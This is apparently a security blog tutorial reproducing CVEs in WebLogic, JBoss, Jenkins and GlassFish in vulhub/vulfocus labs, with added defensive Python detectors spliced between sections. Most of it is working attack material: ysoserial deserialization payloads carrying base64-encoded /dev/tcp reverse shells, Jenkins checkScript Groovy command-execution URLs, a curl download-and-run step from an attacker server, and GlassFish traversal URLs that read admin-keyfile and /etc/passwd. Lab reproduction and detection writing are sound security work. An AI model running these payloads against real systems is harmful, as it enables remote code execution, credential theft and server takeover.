Middleware security: CVE reproduction (Weblogic, JBoss, Jenkins, GlassFish vulnerability reproduction)

Contents

  • Service attack and defense: middleware security, CVE reproduction (Weblogic, JBoss, Jenkins, GlassFish)
    • Middleware: Weblogic security issues
      • Vulnerability reproduction
        • CVE-2017-3506 reproduction
    • Middleware: JBoss security issues
      • Vulnerability reproduction
        • CVE-2017-12149 reproduction
        • CVE-2017-7504 reproduction
    • Middleware: Jenkins security issues
      • Vulnerability reproduction
        • CVE-2017-1000353 reproduction
        • CVE-2018-1000861 reproduction
    • Middleware: GlassFish security issues
      • Vulnerability reproduction
        • CVE-2017-1000028 reproduction

Service attack and defense: middleware security, CVE reproduction (Weblogic, JBoss, Jenkins, GlassFish)

Common middleware and frameworks: IIS, Apache, Nginx, Tomcat, Docker, Weblogic, JBoss, WebSphere, Jenkins, GlassFish, Jira, Struts2, Laravel, Solr, Shiro, ThinkPHP, Spring, Flask, jQuery, etc.
1. Middleware: Weblogic security
2. Middleware: JBoss security
3. Middleware: Jenkins security
4. Middleware: GlassFish security

Security testing of common middleware:
1. Improper configuration: parsing issues and weak passwords
2. Security mechanisms: vulnerabilities specific to the middleware itself
3. Security mechanisms: weak-password brute-force attacks
4. Security applications: vulnerabilities specific to the framework running on the middleware

Middleware security testing process:
1. Identify the middleware: name, version and bundled third-party components
2. Identify its problems: improper configuration and publicly known vulnerabilities
3. Identify how it can be exploited: weak passwords, published exploits (EXP) and framework vulnerabilities

Application service security testing process:
1. Determine which services are open: port scanning, combined applications, etc.
2. Determine what kind of service each one is: database, file transfer, communication, etc.
3. Determine how each service can be exploited: specific vulnerabilities, unauthorized access, weak passwords, etc.

Middleware: Weblogic security issues

Detailed explanation: WebLogic detailed explanation (separate article)

Introduction:
Java application server software
WebLogic is an application server from Oracle Corporation; more precisely, it is middleware built on the Java EE architecture. It is used to develop, integrate, deploy and manage large-scale distributed web, network and database applications, bringing Java's dynamic capabilities and the security of the Java Enterprise standards to the development, integration, deployment and management of large network applications.
Default port to probe: 7001. WebLogic is Oracle's J2EE application server.

Security issues:

CVE-2017-3506
CVE-2018-2893
CVE-2018-3245
CVE-2018-2628 (deserialization)
CVE-2020-14882
CVE-2021-2394 (deserialization)
CVE-2023-21839 (deserialization)

All of the above can essentially be exploited directly with mature, publicly available tools.

Vulnerability reproduction

Take CVE-2017-3506 as the example (the other numbered vulnerabilities are exploited in much the same way: load the target into the tool and click).

CVE-2017-3506 vulnerability reproduction

Lab environment: vulfocus
Start the environment (screenshot omitted).
Access the service (screenshot omitted).
Put the URL directly into the tool for detection. The vulnerability is present and commands can be executed directly (screenshots omitted).

The other vulnerability numbers are exploited the same way: the target is fed to the tool for detection, and if the vulnerability exists, commands can be executed or uploads, injections and other operations carried out directly.

Manual reproduction: WebLogic deserialization vulnerability reproduction (separate article)

Middleware: JBoss security issues

Detailed explanation: JBoss detailed explanation (separate article)

Introduction:
J2EE open-source application server
JBoss is an open-source application server based on J2EE. Its code is licensed under the LGPL and can be used free of charge in any commercial application. JBoss is a container and server that manages EJBs and supports the EJB 1.1, EJB 2.0 and EJB 3 specifications. Its core services do not include a web container for servlets/JSP, so it is generally used together with Tomcat or Jetty.

The ports JBoss usually occupies are 1098, 1099, 4444, 4445, 8080, 8009, 8083 and 8093. Red Hat JBoss Application Server is an open-source application server based on Java EE.

Security issues:

CVE-2017-12149
CVE-2017-7504
Weak passwords / unauthorized access

Vulnerability reproduction

CVE-2017-12149 vulnerability reproduction

This is a Java deserialization vulnerability in the ReadOnlyAccessFilter of JBoss's HttpInvoker component. The filter deserializes the data stream sent by the client without any security checks, which is what makes it exploitable.

Lab environment: vulhub
Reference: JBoss 5.x/6.x Deserialization Vulnerability (screenshot omitted)

Start the environment (screenshot omitted).

Access the service (screenshot omitted).
Exploit:

payload:
//Reverse shell command:
sh -i >& /dev/tcp/192.168.100.1/8888 0>&1
//After base64 encoding:
bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}
//Generate the serialized payload with ysoserial:
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser
//Send it to the invoker with curl:
curl http://192.168.100.134:8080/invoker/readonly --data-binary @poc.ser
//Start the listener on the receiving end:
nc -lvvp 8888

The poc.ser file is generated in the ysoserial tool directory (screenshot omitted).

Send the curl request (screenshot omitted).

The listening terminal receives the connection and the reverse shell succeeds (screenshot omitted).

CVE-2017-7504 vulnerability reproduction

Introduction:
Red Hat JBoss Application Server is an open-source application server based on Java EE. In JBoss AS 4.x and earlier, there is a deserialization vulnerability in the HTTPServerILServlet.java file of the JMS over HTTP Invocation Layer in the JBossMQ implementation. A remote attacker can exploit it to execute arbitrary code using specially crafted serialized data.

Lab environment: vulhub
Reference: JBoss 4.x JBossMQ JMS Deserialization Vulnerability (CVE-2017-7504) (screenshot omitted)

Start the environment (screenshot omitted).

Access the service (screenshot omitted).
Exploit:

//This vulnerability is exploited in the same way as CVE-2017-12149; only the request path differs.
payload:
//Reverse shell command:
sh -i >& /dev/tcp/192.168.100.1/8888 0>&1
//After base64 encoding:
bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}
//Generate the serialized payload with ysoserial:
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser
//Send it with curl:
curl http://192.168.100.134:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @poc.ser
//Start the listener on the receiving end:
nc -lvvp 8888

Send the curl request (screenshot omitted).

The listening terminal receives the connection and the reverse shell succeeds (screenshot omitted).
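A defender's counterpart to the two JBoss write-ups above, added here as an example and not code from the post, from JBoss or from vulhub: a Python check that inspects HTTP requests for raw Java serialization streams (the 0xACED0005 magic) aimed at the /invoker/readonly and /jbossmq-httpil/HTTPServerILServlet endpoints, and pulls class names out of the stream's TC_CLASSDESC records without deserializing anything, so a WAF rule or log review can flag a gadget chain on the wire. It assumes requests are already parsed into method, path and body; the sample requests and the minimal serialized stream produced by build_stream are constructed for the example.

```python
"""Spot Java-serialized bodies posted to the JBoss invoker endpoints.

Added defensive example, not code from the original post or from JBoss/vulhub.
Assumptions: requests are already parsed into (method, path, body); the sample
requests and the minimal serialization stream below are constructed by hand.
"""
import re
import struct
from dataclasses import dataclass

JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"   # STREAM_MAGIC 0xACED + STREAM_VERSION 5
TC_OBJECT, TC_CLASSDESC = 0x73, 0x72      # type codes from the Java serialization grammar

# The two endpoints exploited in the write-ups (CVE-2017-12149, CVE-2017-7504).
DESERIALIZING_PATHS = ("/invoker/readonly", "/jbossmq-httpil/HTTPServerILServlet")

# Class-name prefixes that appear in well-known ysoserial gadget chains (heuristic list).
GADGET_PREFIXES = (
    "org.apache.commons.collections.functors",
    "org.apache.commons.collections4.functors",
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    "javax.management.BadAttributeValueExpException",
)

# TC_CLASSDESC, 2-byte big-endian UTF length (< 512 here), then an ASCII class name.
CLASSDESC_RE = re.compile(rb"\x72([\x00\x01][\x00-\xff])([A-Za-z0-9_$.]{1,255})")


@dataclass
class Request:
    method: str
    path: str
    body: bytes


def is_java_serialized(body: bytes) -> bool:
    """A raw Java object stream always starts with 0xACED0005."""
    return body.startswith(JAVA_SERIAL_MAGIC)


def class_names(stream: bytes) -> list:
    """Heuristically pull class names out of TC_CLASSDESC records without deserializing."""
    names = []
    for m in CLASSDESC_RE.finditer(stream):
        declared = struct.unpack(">H", m.group(1))[0]
        run = m.group(2)
        if 3 <= declared <= len(run):      # the declared length must fit inside the name run
            names.append(run[:declared].decode("ascii"))
    return names


def assess(req: Request) -> dict:
    """Return severity and findings for one request; 'high' means alert or block."""
    findings = []
    if is_java_serialized(req.body):
        findings.append("java-serialized-body")
        if req.path in DESERIALIZING_PATHS:
            findings.append("invoker-endpoint")
        gadgets = [n for n in class_names(req.body) if n.startswith(GADGET_PREFIXES)]
        if gadgets:
            findings.append("gadget-class:" + gadgets[0])
    if "invoker-endpoint" in findings or any(f.startswith("gadget-class:") for f in findings):
        severity = "high"
    elif findings:
        severity = "medium"                # a serialized object sent somewhere unexpected
    else:
        severity = "none"
    return {"path": req.path, "severity": severity, "findings": findings}


def build_stream(class_name: str) -> bytes:
    """Constructed minimal stream: magic, TC_OBJECT, TC_CLASSDESC, name, 8-byte serialVersionUID."""
    name = class_name.encode("ascii")
    return (JAVA_SERIAL_MAGIC + bytes([TC_OBJECT, TC_CLASSDESC])
            + struct.pack(">H", len(name)) + name + b"\x00" * 8)


# Constructed traffic: a gadget-bearing post to the invoker, a serialized object
# sent to an application endpoint, and an ordinary GET.
SAMPLE_REQUESTS = [
    Request("POST", "/invoker/readonly", build_stream("javax.management.BadAttributeValueExpException")),
    Request("POST", "/app/import", build_stream("com.example.Order")),
    Request("GET", "/invoker/readonly", b""),
]

if __name__ == "__main__":
    for r in SAMPLE_REQUESTS:
        print(assess(r))
```

The class-name scan is a heuristic over the stream grammar, not a parser, so treat a hit as a reason to look, not as proof. The durable fix for both CVEs is to remove or authenticate the invoker servlets in the JBoss web.xml, because a serialized object reaching them at all is the condition the exploits depend on.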

Middleware: Jenkins security issues

Detailed explanation: Jenkins detailed explanation (separate article)
Introduction:

Open-source software project
Jenkins is an open-source, Java-based continuous integration tool used to monitor continuously repeated work. It aims to provide an open, easy-to-use platform on which software projects can run continuous integration.
Default port to probe: 8080

Security issues:

CVE-2017-1000353

CVE-2018-1000861

Vulnerability reproduction

CVE-2017-1000353 vulnerability reproduction

Lab environment: vulfocus or vulhub
Reference: Jenkins-CI remote code execution vulnerability
vulhub environment (screenshot omitted).

vulfocus environment (screenshot omitted).
Open the lab environment (screenshot omitted).

Access the service (screenshot omitted).

Exploit:
Tool: CVE-2017-1000353 (linked repository)
The JDK version must be jdk-8u291; other versions may fail, and the vulnerability then cannot be reproduced.
Download: JDK8 (linked)

payload:
//Generate the serialized object that creates a file
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /123.txt"
//Run the exploit
python exploit.py http://192.168.100.134:8080/ jenkins_poc.ser

//Then go back to the target machine, open a terminal and run the following to check whether it worked:
docker ps -a
docker exec -it 838723a23ad0 /bin/bash
ls /

(screenshot omitted)

Reverse shell command:

sh -i >& /dev/tcp/192.168.100.1/8888 0>&1
//After base64 encoding
bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}

//Reverse shell:
//Replace the file-creation command above with the base64-encoded reverse shell command
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}"
//Run the exploit
python exploit.py http://192.168.100.134:8080/ jenkins_poc.ser

//Start the listener on the receiving end
nc -lvvp 8888

(screenshot omitted)
Pay attention to the JDK version; otherwise reproduction may fail.

CVE-2018-1000861 vulnerability reproduction

Lab environment: vulhub
Reference: Jenkins remote command execution vulnerability (screenshot omitted)
Start the environment (screenshot omitted).

Access the service (screenshot omitted).

Exploit:
Exploit download: CVE-2018-1000861 EXP (linked repository)

//The exploit script can be used directly; it runs under Python 2
payload:
python2 exp.py

python2 exp.py http://192.168.100.134:8080/ "touch /tmp/123.txt"
python2 exp.py http://192.168.100.134:8080/ "touch /tmp/test.txt"

//Enter the lab environment to verify:
docker ps
docker exec -it <lab container id> /bin/bash
ls /tmp/

Usage instructions and the run itself (screenshots omitted).

Verification succeeds: the file was created (screenshot omitted).

Manual testing is also possible:

Manual detection:
poc:
http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"touch /tmp/rumilc".execute()}}
payload:
Create a file:
//Send the following request:
http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"touch /tmp/rumilc".execute()}}

(screenshot omitted)

Verify: the file was created (screenshot omitted).

Reverse shell:

payload:
//Base64-encoded reverse shell command
python2 exp.py http://192.168.100.134:8080 "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}"
//Start the listener on the receiving end
nc -lvvp 8888

(screenshot omitted)

The reverse shell succeeds (screenshot omitted).
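The base64-wrapped reverse shell used in each of the write-ups above leaves a distinctive process command line on the victim. As an added defensive example, not part of the original post, the Python below decodes such a blob from process telemetry, looks for reverse-shell indicators (/dev/tcp/, sh -i, nc -e) in both the outer command and the decoded text, and extracts the remote address and port for the alert. It assumes each telemetry record carries a cmdline string, as an EDR or auditd collector would supply; the records are constructed, and the first blob is the one from the post.

```python
"""Decode base64-wrapped shell commands from process telemetry and flag reverse shells.

Added defensive example, not code from the original post. Assumptions: each
telemetry record is a dict with a "cmdline" string (as an EDR or auditd
collector would hand it over); the records below are constructed.
"""
import base64
import re

# The brace-expansion form used throughout the write-up:  bash -c {echo,<b64>}|{base64,-d}|{bash,-i}
BRACE_B64_RE = re.compile(r"\{echo,([A-Za-z0-9+/=]+)\}\s*\|\s*\{base64,-d\}")
# The plain form:  echo <b64> | base64 -d | bash
PLAIN_B64_RE = re.compile(r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+(?:-d|--decode)")
# Decoded bytes piped straight into a shell, in either form.
B64_TO_SHELL_RE = re.compile(r"base64,-d\}\s*\|\s*\{(?:ba)?sh[,}]|base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b")
DEV_TCP_RE = re.compile(r"/dev/(?:tcp|udp)/([\d.]+)/(\d+)")

REVERSE_SHELL_MARKERS = ("/dev/tcp/", "/dev/udp/", "nc -e", "sh -i", "bash -i")


def decode_embedded_b64(cmdline: str) -> list:
    """Return every base64 blob that is piped into a decoder, decoded to text."""
    decoded = []
    for rx in (BRACE_B64_RE, PLAIN_B64_RE):
        for m in rx.finditer(cmdline):
            try:
                decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
            except ValueError:            # binascii.Error is a ValueError: bad padding or alphabet
                continue
    return decoded


def analyse(cmdline: str) -> dict:
    """Inspect the outer command line and everything it decodes to."""
    decoded = decode_embedded_b64(cmdline)
    findings = set()
    if B64_TO_SHELL_RE.search(cmdline):
        findings.add("b64-to-shell")
    remote = None
    for layer in [cmdline] + decoded:
        findings.update(m for m in REVERSE_SHELL_MARKERS if m in layer)
        hit = DEV_TCP_RE.search(layer)
        if hit and remote is None:
            remote = (hit.group(1), int(hit.group(2)))
    if remote or findings & {"/dev/tcp/", "/dev/udp/", "nc -e"}:
        severity = "high"
    elif findings:
        severity = "medium"               # encoded input fed to a shell, purpose unknown
    else:
        severity = "none"
    return {"decoded": decoded, "findings": sorted(findings), "remote": remote, "severity": severity}


# Constructed telemetry. The first blob is the one from the write-up and decodes to
# "sh -i >& /dev/tcp/192.168.100.1/8888 0>&1"; the other records are benign.
SAMPLE_TELEMETRY = [
    {"pid": 4121, "user": "jboss",
     "cmdline": "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}"},
    {"pid": 4122, "user": "deploy", "cmdline": "echo aGVsbG8= | base64 -d"},
    {"pid": 4123, "user": "deploy", "cmdline": "ls -la /opt/jboss/server/default/deploy"},
]


def triage(records) -> list:
    """Return (pid, severity, remote) for every record that is not clean."""
    out = []
    for rec in records:
        verdict = analyse(rec["cmdline"])
        if verdict["severity"] != "none":
            out.append((rec["pid"], verdict["severity"], verdict["remote"]))
    return out


if __name__ == "__main__":
    for row in triage(SAMPLE_TELEMETRY):
        print(row)
```

The parent process matters as much as the command line: a bash launched by the JBoss or Jenkins Java process with a base64 blob on its argument list is the shape every section of this article produces, so pairing this decoder with a parent-process check (java spawning bash) cuts false positives from ordinary deploy scripts.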

PS: If the shell does not connect back, create a text file on your own server containing the reverse shell command, serve it with Python's built-in HTTP server, and watch the request log to see whether the target fetches it.

//Start the HTTP server:
python -m http.server 8080

//Run the exploit script so the target downloads the file:
python2 exp.py <target host> "curl -o /tmp/cmd.sh http://xxxx:8080/cmd.txt"

//Run the exploit script again so the target executes the script and connects back:
python2 exp.py <target host> "bash /tmp/cmd.sh"

(screenshot omitted)

The HTTP server shows the request (screenshot omitted).

Enter the lab environment to verify that the file exists (screenshot omitted).
Then use the python2 exploit script to execute it.

You can also do the same manually from the browser:

payload:
//Local demo
//Save the file on the target host:
//http://ip:port/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl -o /tmp/cmd.sh http://VPSip:8080/cmd.txt".execute()}}
http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl -o /tmp/cmd.sh http://127.0.0.1:8080/cmd.txt".execute()}}

//Execute the shell script
//http://ip:port/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"bash /tmp/cmd.sh".execute()}}
http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"bash /tmp/cmd.sh".execute()}}

When the request is made, the browser shows a blank page: execution succeeded (screenshot omitted).

Middleware: GlassFish security issues

Introduction:
Detailed explanation of GlassFish (separate article)

A commercial application server
GlassFish is a robust, commercially compatible, production-quality application server that is free for development, deployment and redistribution. Developers can obtain the source code for free and modify it.

Security issues:

CVE-2017-1000028

Vulnerability reproduction

CVE-2017-1000028 vulnerability reproduction

Vulnerability principle:

In Java, the encoded sequence used in the payload below is parsed into a character that is ultimately escaped to the ASCII character . (dot). Stringing several of these together with / walks up the directory tree, achieving directory traversal and arbitrary file reading.

Lab environment: vulhub
Reference: GlassFish Arbitrary File Reading Vulnerability (screenshot omitted)

Start the environment (screenshot omitted).

Enter the environment and access it:
Once the environment is running, visit http://your-ip:8080 and http://your-ip:4848. Port 8080 serves the website content and port 4848 is the GlassFish administration console (screenshot omitted).

payload:
//Read the admin password file:
https://192.168.100.134:4848/theme/META-INF/..........domains/domain1/config/admin-keyfile

//Read a file under Linux:
https://192.168.100.134:4848/theme/META-INF/////// ////etc/passwd

//Read a file under Windows:
http://your-ip:4848/theme/META-INF/////// ////windows/win.ini

The password file is read successfully (screenshot omitted).

The file is read successfully (screenshot omitted).
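Both the Jenkins checkScript requests in the CVE-2018-1000861 section and the GlassFish traversal requests in the CVE-2017-1000028 section are visible in ordinary web access logs. As an added defensive example, not code from the post or from either project, the Python below scans constructed access-log lines for the checkScript endpoint carrying a process-spawning Groovy value (and notes whether the caller was anonymous), and for requests under /theme/ whose percent-decoded path contains .. segments or invalid UTF-8 byte sequences, which is how an encoded traversal slips past a naive string filter. The log format (ip user "METHOD url" status, with - as the anonymous user) and every sample line are assumed for the example.

```python
"""Flag the Jenkins checkScript and GlassFish path-traversal request shapes in access logs.

Added defensive example, not code from the original post or from Jenkins/GlassFish.
Assumptions: log lines follow the constructed format  ip user "METHOD url" status,
where user is "-" for an unauthenticated (anonymous) request; all lines are made up.
"""
import re
from urllib.parse import parse_qs, unquote_to_bytes, urlsplit

# Endpoint abused in CVE-2018-1000861 (path taken from the write-up above).
CHECKSCRIPT_SUFFIX = ("/descriptorByName/org.jenkinsci.plugins.scriptsecurity"
                      ".sandbox.groovy.SecureGroovyScript/checkScript")
# Groovy constructs that spawn a process; a script-check value should never contain them.
GROOVY_EXEC_RE = re.compile(r"\.execute\s*\(|Runtime\.getRuntime|ProcessBuilder")
# Static-resource prefix abused in CVE-2017-1000028.
GLASSFISH_THEME_PREFIX = "/theme/"

LOG_RE = re.compile(r'^(?P<ip>\S+) (?P<user>\S+) "(?P<method>[A-Z]+) (?P<url>\S+)" (?P<status>\d{3})$')


def parse_line(line: str):
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def check_jenkins(entry: dict) -> list:
    parts = urlsplit(entry["url"])
    if not parts.path.endswith(CHECKSCRIPT_SUFFIX):
        return []
    findings = ["jenkins-checkscript"]
    if entry["user"] == "-":
        findings.append("unauthenticated")
    script = " ".join(parse_qs(parts.query).get("value", []))
    if GROOVY_EXEC_RE.search(script):
        findings.append("groovy-command-execution")
    return findings


def check_glassfish(entry: dict) -> list:
    path = urlsplit(entry["url"]).path
    if not path.startswith(GLASSFISH_THEME_PREFIX):
        return []
    findings = []
    raw = unquote_to_bytes(path)            # percent-decode once, to bytes, with no normalisation
    try:
        decoded = raw.decode("utf-8")
    except UnicodeDecodeError:              # overlong or otherwise invalid UTF-8 inside a path
        findings.append("malformed-utf8-in-path")
        decoded = raw.decode("latin-1")
    if ".." in decoded.split("/"):
        findings.append("dot-dot-traversal")
    return findings


def assess(line: str) -> dict:
    entry = parse_line(line)
    if entry is None:
        return {"severity": "unparsed", "findings": []}
    findings = check_jenkins(entry) + check_glassfish(entry)
    if {"groovy-command-execution", "dot-dot-traversal", "malformed-utf8-in-path"} & set(findings):
        severity = "high"
    elif "unauthenticated" in findings:
        severity = "medium"                 # anonymous access to a script-checking endpoint at all
    elif findings:
        severity = "low"
    else:
        severity = "none"
    return {"ip": entry["ip"], "severity": severity, "findings": findings}


# Constructed access-log lines (addresses and paths made up for the example).
SAMPLE_LOG = [
    '198.51.100.7 - "GET /securityRealm/user/admin' + CHECKSCRIPT_SUFFIX +
    '?sandbox=true&value=public%20class%20x%7Bpublic%20x()%7B%22touch%20/tmp/test%22.execute()%7D%7D" 200',
    '10.0.0.5 alice "GET /securityRealm/user/alice' + CHECKSCRIPT_SUFFIX + '?sandbox=true&value=println%20%22hi%22" 200',
    '198.51.100.7 - "GET /theme/META-INF/../../../domains/domain1/config/admin-keyfile" 200',
    '198.51.100.7 - "GET /theme/META-INF/%c0%80/MANIFEST.MF" 404',
    '10.0.0.9 - "GET /theme/com/sun/webui/jsf/suntheme/images/login/gradlogbot.jpg" 200',
]


def triage(lines) -> list:
    """(ip, severity) for every line that parsed and is not clean."""
    return [(r["ip"], r["severity"]) for r in map(assess, lines) if r["severity"] not in ("none", "unparsed")]


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(assess(line))
```

Decoding to bytes and then insisting on valid UTF-8 is the important step: a filter that only looks for the literal string ../ in the raw URL misses traversal written with non-standard encodings, while the server-side decoder that GlassFish used happily turned those bytes into dots. The same byte-level check also covers %2e%2e variants, because unquote_to_bytes resolves them before the .. test.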